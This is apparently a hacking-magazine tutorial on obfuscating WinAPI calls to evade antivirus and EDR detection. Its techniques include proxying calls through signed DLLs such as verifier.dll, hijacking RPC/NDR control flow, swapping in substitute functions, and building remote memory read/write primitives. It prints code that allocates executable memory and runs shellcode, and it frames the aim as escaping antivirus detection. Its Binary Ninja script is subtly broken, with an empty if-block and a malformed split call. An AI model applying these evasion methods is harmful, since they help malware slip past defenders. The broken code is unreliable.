Crooked path. New obfuscation techniques for WinAPI calls

All malicious tools try to hide their WinAPI calls: if the program code contains suspicious functions, its execution can be blocked. There are very few documented ways to obfuscate WinAPI calls, but I would like to share with you some promising ideas in this field. Prepare to scan memory, examine Windows components, and even abuse RPC.

warning

This article is intended for security specialists operating under a contract; all information provided in it is for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication. Distribution of malware, disruption of systems, and violation of secrecy of correspondence are prosecuted by law.

As you know, any (even the most terrible) ‘virus’ is just a program that uses the same mechanisms and functions as legitimate software. It can be said that malware abuses functions available to any developer. Sometimes, undocumented features are abused as well… This is what we call “hacking”!

To make a verdict whether to recognize a program malicious or not, an antivirus analyzes and compares many factors, but the most important procedure is analysis of functions used in its code. Many different aspects can be analyzed: hooks, import tables, execution flow… In difficult cases, even quick decompiling can be performed. Hackers, in turn, found ways to unhook ntdll.dll, hide IAT, use API Hashing, and prevent DLL loading.

Imagine a situation where you can avoid calling suspicious functions: you don’t touch dangerous things, and the antivirus doesn’t touch you!

For example, instead of VirtualAllocEx(), you could call some alternative. Certain techniques make it possible to take a workaround without touching ‘suspicious’ methods or hiding their use.

Proxying calls

Theory

This technique is called Proxy Invoke: a hacker finds a function that makes the required calls (thus, ‘proxying’ these calls). In fact, Proxy Invoke abuses other people’s stubs over existing methods.

For example, the ZwProtectVirtualMemory()function makes it possible to change memory permissions. It’s considered somewhat dangerous because, using it, you can mark an address space as executable. An attempt to use this function would trigger an alert (e.g. in Elastic).

www

For more information, you can check the article Doubling Down: Detecting In-Memory Threats with Kernel ETW Call Stacks.

The very first alert shown in the above screenshot (i.e. VirtualProtect API Call from an Unsigned DLL) is of special interest. The detection logic is simple: if a function is called from the address space of an unsigned library, then this call is considered malicious. This is reasonable: why would an ordinary developer call the Zw function from their program? There is something screwy about it…

Such detection can be bypassed using proxying. You have to find a legitimate signed binary with an exported function that passes the control flow to the target function.

Below is the initial control flow:

malware → ntdll!ZwProtectVirtualMemory

The modified control flow will look as follows:

malware → signed!SomeFuncToProtectMemory → ntdll!ZwProtectVirtualMemory

As a result, no detection occurs because the call chain starts from a legitimate signed library. Similar logic in a slightly simplified format is implemented in the Parasite-Invoke tool. However, it only works with programs written in C#.

Identifying proxy functions

Export/import table

There is an easy way, and there is the way of the samurai. Let’s start with the easy one. Its idea is as follows: you quickly analyze all the signed DLLs in the system and identify functions contained in them that can be reached. There are two variants.

You can go by the import table. For example, you see the import of ZwProtectVirtualMemory(), find the place where this function is called, and check whether it’s possible to control its arguments; or
You can go by the export table. For example, you see the export of the AllocateAndProtectSomeMemory()function, decide that its functionality can potentially be of interest to you, and examine this function in detail.

The findSymbols.py script expedites and simplifies such analysis.

For instance, this is how you can find all imports of the MiniDumpWriteDump() function.

This is how you can analyze exports:

python .\findSymbols.py "c:\windows\system32" -s "memory" -e

However, not all functions are declared as exported, and you can also perform analysis of symbols (as I did in SymProcAddress). But still, there are too many ‘ifs’ and excessive research. You want to automate the process and instantly call the required function, right? Then your choice is bushido!

Binary analysis

The way of the samurai is as follows: you automate the binary file analysis stage using the API of some decompiler. I borrowed this technique from cryptoplague who uses Binary Ninja to automate the analysis of signed DLLs. The original code is as follows:

import os
import binaryninja
from binaryninja import highlevelil
signed_dlls_path = r'C:\Users\user\source\repos\SignedDllAnalyzer\signed_dlls.txt'
with open(signed_dlls_path, "r") as f:
    signed_dlls = [dll.strip() for dll in f]
total_dlls = len(signed_dlls)
with open(signed_dlls_path, "r") as f:
    current_dll = 0
    for signed_dll_path in f:
        current_dll += 1
        signed_dll_path = signed_dll_path.strip()
        dll_name = signed_dll_path.split('')[-1]
        dll_size_mb = os.path.getsize(signed_dll_path) / 1024 / 1024
        progress = f"{current_dll}/{total_dlls}"
        if dll_size_mb > 15:
            print(f"[-] [{progress}] [{dll_name}] [{dll_size_mb:.2f} > 15 MB]")
            continue
        print(f"[*] [{progress}] [{dll_name}] [{dll_size_mb:.2f} MB]")
        with binaryninja.load(signed_dll_path, update_analysis=False) as binary_view:
            ntAllocateVirtualMemorySymbol = binary_view.get_symbol_by_raw_name("NtAllocateVirtualMemory")
            if not ntAllocateVirtualMemorySymbol:
                continue
            else:
                print(f"[+] [{progress}] [{dll_name}] [NtAllocateVirtualMemory]")
                binary_view.set_analysis_hold(False)
                binary_view.update_analysis_and_wait()
                code_refs = binary_view.get_code_refs(ntAllocateVirtualMemorySymbol.address)
                for ref in code_refs:
                    try:
                        func = binary_view.get_functions_containing(ref.address)[0]
                        hlil_instr = func.get_llil_at(ref.address).hlil
                        for operand in hlil_instr.operands:
                            if type(operand) == HighLevelILCall:
                                if operand.dest.value.value == ntAllocateVirtualMemorySymbol.address:
                                    hlil_call = operand
                                    break
                        args = hlil_call.params
                        protect = args[5]
                        regionSize = args[3]
                        if type(protect) == HighLevelILVar:
                            if protect.var not in func.parameter_vars:
                                continue
                        if type(regionSize) == HighLevelILVar:
                            if regionSize.var not in func.parameter_vars:
                        if type(protect) == HighLevelILConst:
                            if int(protect.value) != 0x40:
                                continue
                        if type(regionSize) == HighLevelILConst:
                            if int(regionSize.value) <= 0x10000:
                                continue
                        print(f"[+] [{progress}] [{dll_name}] [{hex(ref.address)}] [{hlil_instr}]")
                    except Exception as e:
                        print(f"[x] [{progress}] [{dll_name}] [{e}]")

Let’s examine this script step by step since it contains several nontrivial ideas.

First of all, the script reads a text file containing paths to signed libraries (e.g. C:\Windows\System32).

import os
import binaryninja
from binaryninja import highlevelil
signed_dlls_path = r'C:\Users\user\source\repos\SignedDllAnalyzer\signed_dlls.txt'
with open(signed_dlls_path, "r") as f:
    signed_dlls = [dll.strip() for dll in f]
total_dlls = len(signed_dlls)

Then each library is analyzed in a loop.

with open(signed_dlls_path, "r") as f:
    current_dll = 0
    for signed_dll_path in f:
        current_dll += 1
        signed_dll_path = signed_dll_path.strip()
        dll_name = signed_dll_path.split('')[-1]
        dll_size_mb = os.path.getsize(signed_dll_path) / 1024 / 1024
        progress = f"{current_dll}/{total_dlls}"
        if dll_size_mb > 15:
            print(f"[-] [{progress}] [{dll_name}] [{dll_size_mb:.2f} > 15 MB]")
            continue
        print(f"[*] [{progress}] [{dll_name}] [{dll_size_mb:.2f} MB]")
        with binaryninja.load(signed_dll_path, update_analysis=False) as binary_view:

The program checks the size of each library and doesn’t analyze those exceeding 15 MB. Smaller libraries are passed to Binary Ninja for binary analysis using the load() method.

Binary Ninja and BinaryView

Importantly, Binary Ninja not only has a GUI, but also an API: using it, you can load a binary file and perform some automatic analysis.

The binary will be represented as a BinaryView object (bv in the documentation). It provides a set of methods that can be applied to the file (e.g. get the list of its functions).

>>> bv
<BinaryView: '/bin/ls', start 0x100000000, len 0x182f8>
>>> len(bv.functions)
140

Using BinaryView, you can retrieve the Function class that points (what a surprise!) to a function in the code.

The function will be presented in the BNIL (Binary Ninja Intermediate Language) format. This is a special type of assembly instructions for Binary Ninja. There are several forms: LLIL, MLIL, HLIL, and Pseudo-C; they differ in abstraction depth. The higher is the level, the more human-readable is the code. The lower is the level, the closer it is to stuff executed by your computer.

The representation in the SSA (Static Single Assignment) form is supported separately. This is a code optimization mechanism used by the compiler; its main concept is that a specific variable is assigned a value only in one place in the code.

To search for functions, the following algorithm is used:

Get a BinaryView;
Find out whether the required function is used in it;
Determine the location from where the required function is called; and
Make sure that you can control arguments passed to this function.

All these steps can be automated using Binary Ninja. First, you search for a given symbol. If there is no such symbol, then the function isn’t used.

ntAllocateVirtualMemorySymbol = binary_view.get_symbol_by_raw_name("NtAllocateVirtualMemory")
if not ntAllocateVirtualMemorySymbol:
    continue
else:
    print(f"[+] [{progress}] [{dll_name}] [NtAllocateVirtualMemory]")

After making sure that the required method is present, you start analysis. The set_analysis_hold() method ‘enables’ the analysis; while update_analysis_and_wait() performs it.

binary_view.set_analysis_hold(False)
binary_view.update_analysis_and_wait()

After BN has analyzed the binary code, you can proceed to step three: you have to find places that refer to the required method using get_code_refs().

code_refs = binary_view.get_code_refs(ntAllocateVirtualMemorySymbol.address)

Then you go through all these references in a loop to find functions that refer to the required method.

for ref in code_refs:
    try:
        func = binary_view.get_functions_containing(ref.address)[0]

Next, you have to make sure that the function is actually called (i.e. it’s not just a reference to an address).

hlil_instr = func.get_llil_at(ref.address).hlil
for operand in hlil_instr.operands:
    if type(operand) == HighLevelILCall:
        if operand.dest.value.value == ntAllocateVirtualMemorySymbol.address:
            hlil_call = operand
            break

To do this, you get LLIL (low-level instruction representation) at the given address, convert it to HLIL, and confirm that the function is actually called based on the presence of the Call operand.

Finally, you get the function parameters and analyze them to find out whether you can affect these variables using parameters of the wrapper function.

args = hlil_call.params
protect = args[5]
regionSize = args[3]
if type(protect) == HighLevelILVar:
    if protect.var not in func.parameter_vars: # Check for the presence of parent function in parameters
        continue
if type(regionSize) == HighLevelILVar:
    if regionSize.var not in func.parameter_vars:
if type(protect) == HighLevelILConst:
    if int(protect.value) != 0x40:
        continue
if type(regionSize) == HighLevelILConst:
    if int(regionSize.value) <= 0x10000:
        continue
print(f"[+] [{progress}] [{dll_name}] [{hex(ref.address)}] [{hlil_instr}]")

Using this script, I managed to identify the place where the NtAllocateVirtualMemory() function is used inside verifier.dll.

Further research made it possible to locate the DphCommitMemoryFromPageHeap() function from verifier.dll; inside this function, NtAllocateVirtualMemory() was called.

Here is the much-desired NtAllocateVirtualMemory()!

Example with DphCommitMemoryFromPageHeap

After you’ve found the required function, you have to transfer the control flow to its address. This can be done in two ways:

determine the function offset relative to the base address of the DLL loaded to memory; or
determine the address of the target function by the byte pattern.

I suggest following the second way. Using IDA, you have to scan memory for specific opcodes. First of all, let’s determine initial instructions of the target function.

Instructions that will be used to search for the function

Then convert them into opcodes that will be used in the scan.

Defining prototype of the function to be called.

typedef int (WINAPI* DphCommitMemoryFromPageHeapFunc)(
    PVOID* BaseAddress,
    PSIZE_T RegionSize,
    ULONG Protect
    );

Adding code based on the memory scan and transferring the control flow to the function!

int main()
{
    HMODULE hModule = NULL;
    hModule = LoadLibraryA("verifier.dll");
    DphCommitMemoryFromPageHeapFunc DphCommitMemoryFromPageHeapWPtr = (DphCommitMemoryFromPageHeapFunc)(FindFunction(GetCurrentProcess(), GetFunctionBytes(), (uintptr_t)hModule));
    SIZE_T size = 0xABCD;
    LPVOID addr = nullptr;
    NTSTATUS err = DphCommitMemoryFromPageHeapWPtr(&addr, &size, PAGE_EXECUTE);
    std::wcout << err << std::endl;
    return 0;
}

The full code can be found in my repository on GitHub. Below you can see the result of this call.

In the above-mentioned research, its author calls the AVrfpNtAllocateVirtualMemory()function based on its offset, but you can get its address by the byte pattern if you want.

typedef NTSTATUS (*AVrfpNtAllocateVirtualMemory_t)
(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    ULONG_PTR *RegionSize,
    ULONG AllocationType,
    ULONG Protect
);
DWORD protect{};
LPVOID virtualMemory = nullptr;
SIZE_T size = rawShellcodeLength;
HMODULE hVerifierMod = this->api.LoadLibraryA.call("verifier.dll");
AVrfpNtAllocateVirtualMemory_t AVrfpNtAllocateVirtualMemory = (AVrfpNtAllocateVirtualMemory_t)((char*)hVerifierMod + 0x25110);
AVrfpNtAllocateVirtualMemory(NtCurrentProcess(), &virtualMemory, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
this->api.RtlMoveMemory.call(virtualMemory, rawShellcode, rawShellcodeLength);
(*(int(*)()) virtualMemory)();

Using RPC

Frankly speaking, proxying via calls is a sophisticated technique whose theory won’t fit into a single article. It’s described is detail in a report delivered at one of the conferences. I will try to present it as briefly as possible.

When devices interact over the RPC protocol, marshalling and unmarshalling of transmitted parameters occurs. This is required because function arguments are transmitted over the network, and complex structures cannot be simply placed into a socket.

Data processing occurs in special NDR (Network Data Representation) functions. These functions receive data in the form of RPC_MESSAGE structures. Inside such a structure, there are plenty of other nested structures, and you can manipulate them to transfer the control flow to an arbitrary address.

Transferring the control flow from MIDL_SERVER_INFO

This technique has its own peculiarities: at a minimum, you have to initialize the RPC environment in the current process. A video demonstration is available on YouTube, and a POC can be found on GitHub.

Overall, using the RPC subsystem, you can call any WinAPI function and pass its arguments, which can be considered proxying.

Using alternative functions

Theory

Time to take a breather and examine a slightly simpler technique: using alternative functions, you can try to find a workaround to the required functionality. For instance, instead of using the memcpy() function, you can write the method logic yourself and manually copy the data using pointers. Or, as an alternative, you can find and call a slightly lower-level (and potentially unhooked) analogue.

Generally speaking, this technique is closely related to proxy functions: some method can call the original function under the hood or act as a wrapper over a wrapper… Reverse-engineering each of them would take enormous time and effort. What’s most important is to find an alternative WinAPI call.

Substituting CRT

The easiest way is to substitute CRT functions. For instance, you can substitute the memcpy() function as shown below:

PVOID _memcpy(PVOID Destination, PVOID Source, SIZE_T Size)
{
    for (volatile int i = 0; i < Size; i++) {
        ((BYTE*)Destination)[i] = ((BYTE*)Source)[i];
    }
    return Destination;
}

This way, you can compare strings using wcscmp():

int custom_wcscmp(const wchar_t* str1, const wchar_t* str2) {
    while (*str1 == *str2 && *str1 != L'\0') {
        str1++;
        str2++;
    }
    return *str1 - *str2;
}

And convert lower case to upper case:

PCHAR CaplockStringA(_In_ PCHAR Ptr)
{
    PCHAR sv = Ptr;
    while (*sv != '\0')
    {
        if (*sv >= 'a' && *sv <= 'z')
            *sv = *sv - ('a' - 'A');
        sv++;
    }
    return Ptr;
}
PWCHAR CaplockStringW(_In_ PWCHAR Ptr)
{
    PWCHAR sv = Ptr;
    while (*sv != '\0')
    {
        if (*sv >= 'a' && *sv <= 'z')
            *sv = *sv - ('a' - 'A');
        sv++;
    }
    return Ptr;
}

CRT contains plenty of functions, and almost all of them can be rewritten so that their logic is implemented manually. More examples can be found in the NOCRT and vx-api repositories.

References to Windows structures

In most cases, Windows uses the same structures in functions with similar logic. This feature makes it possible to search for similar functions. The easiest way is to search using IDE. To do this, you have to find a header file that contains the structure you are interested in.

info

The same method can be used to search for proxy functions; so, I won’t discuss them separately.

Imagine that you have the SetThreadContext() function that receives a CONTEXT structure.

The CONTEXT structure is defined in the winnt.h file.

You left-click on PCONTEXT, then right-click and select “Find all references”.

You get a long list of references to this structure from different functions.

You examine them and find the RtlCaptureContext2() function with similar capabilities!

Mastering COM

The COM subsystem offers a huge number of various features. You just have to comprehend it and understand its elements: what is a COM class, how are they registered in the system, how interfaces and methods work, and so on. If you manage to do this, you’ll make plenty of exciting discoveries!

www

If you are interested in mastering COM, tools available in my COMThanasia repository can help you with this.

For example, the {00000618-0000-0010-8000-00aa006d2ea4} object has an interface that contains the ChangePassword()method; apparently, this method can be used to change user’s password. Therefore, you can call ChangePassword() from COM to avoid calling functions from netapi.dll.

ReadProcessMemory() Replacement

Finally, I would like to show you several ‘workarounds’ that can be used to call functions. Currently, ReadProcessMemory() methods can be substituted in several ways:

by abusing vulnerable drivers (e.g. wnbios64.sys); or
using RtlFirstEntrySList().

The first option is obvious: the driver provides a vulnerable method that can be used to read memory. The second one is slightly more complicated. A researcher whose nickname is x86matthew discovered the RtlFirstEntrySList() function that takes an address and returns the value at this address.

DWORD __stdcall RtlFirstEntrySList(DWORD *pValue)
{
    return *pValue;
}

If you call this function in a remote process using CreateRemoteThread() or NtCreateThreadEx(), you can get a data reading primitive. The author removed the PoC and article from his blog; however, everything is available in the Internet Archive (a link to it is provided below).

If you are working from C# code, make sure to pay attention to System.StubHelpers.GetNDirectTarget().

public static IntPtr ReadMemory(IntPtr addr)
{
    var stubHelper = typeof(System.String).Assembly.GetType("System.StubHelpers.StubHelpers");
    var GetNDirectTarget = stubHelper.GetMethod("GetNDirectTarget", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
    IntPtr unmanagedPtr = Marshal.AllocHGlobal(200);
    for (int i = 0; i < 200; i += IntPtr.Size)
    {
        Marshal.Copy(new[] { addr }, 0, unmanagedPtr + i, 1);
    }
    return (IntPtr)GetNDirectTarget.Invoke(null, new object[] { unmanagedPtr });
}

Substituting WriteProcessMemory()

The same article by x86matthew proposes an alternative to writing to memory. The solution is also based on functions incrementing and decrementing a value at a certain address. By calling these functions for a certain address in a process multiple times, you can change values in memory (and, therefore, write).

LONG __stdcall InterlockedIncrement(LONG *Addend);
LONG __stdcall InterlockedDecrement(LONG *Addend);

Where to look for alternatives

More exciting possibilities and options can be found in the VX-Underground blog. It offers plenty of interesting developments that can be used in your own code. For example, you can start a process without calling CreateProcess(), but by simulating Win-R keystrokes… Isn’t this cool?

Conclusions

Obfuscation of WinAPI calls is an extremely creative and inspiring process. All you have to do is examine the system from new angles and think outside the box. If you manage to find a new way and deviate from the beaten path, you have a good chance to avoid antivirus radars!

Good luck!

warning

Proxying calls

Theory

www

Identifying proxy functions

Export/import table

Binary analysis

Binary Ninja and BinaryView

Example with DphCommitMemoryFromPageHeap

Using RPC

Using alternative functions

Theory

Substituting CRT

References to Windows structures

info

Mastering COM

www

ReadProcessMemory() Replacement

Substituting WriteProcessMemory()

Where to look for alternatives

Conclusions

03.03.2023 — Nightmare Spoofing. Evil Twin attack over dynamic routing

08.06.2023 — Cold boot attack. Dumping RAM with a USB flash drive

16.02.2022 — Timeline of everything. Collecting system events with Plaso

01.01.2022 — It's a trap! How to create honeypots for stupid bots

09.02.2022 — First contact: An introduction to credit card security

15.12.2022 — What Challenges To Overcome with the Help of Automated e2e Testing?

13.01.2022 — Step by Step. Automating multistep attacks in Burp Suite

12.01.2022 — First contact. Attacks against contactless cards

26.03.2023 — Attacks on the DHCP protocol: DHCP starvation, DHCP spoofing, and protection against these techniques

03.06.2022 — Challenge the Keemaker! How to bypass antiviruses and inject shellcode into KeePass memory

03.03.2023 —
Nightmare Spoofing. Evil Twin attack over dynamic routing

08.06.2023 —
Cold boot attack. Dumping RAM with a USB flash drive

16.02.2022 —
Timeline of everything. Collecting system events with Plaso

01.01.2022 —
It's a trap! How to create honeypots for stupid bots

09.02.2022 —
First contact: An introduction to credit card security

15.12.2022 —
What Challenges To Overcome with the Help of Automated e2e Testing?

13.01.2022 —
Step by Step. Automating multistep attacks in Burp Suite

12.01.2022 —
First contact. Attacks against contactless cards

26.03.2023 —
Attacks on the DHCP protocol: DHCP starvation, DHCP spoofing, and protection against these techniques

03.06.2022 —
Challenge the Keemaker! How to bypass antiviruses and inject shellcode into KeePass memory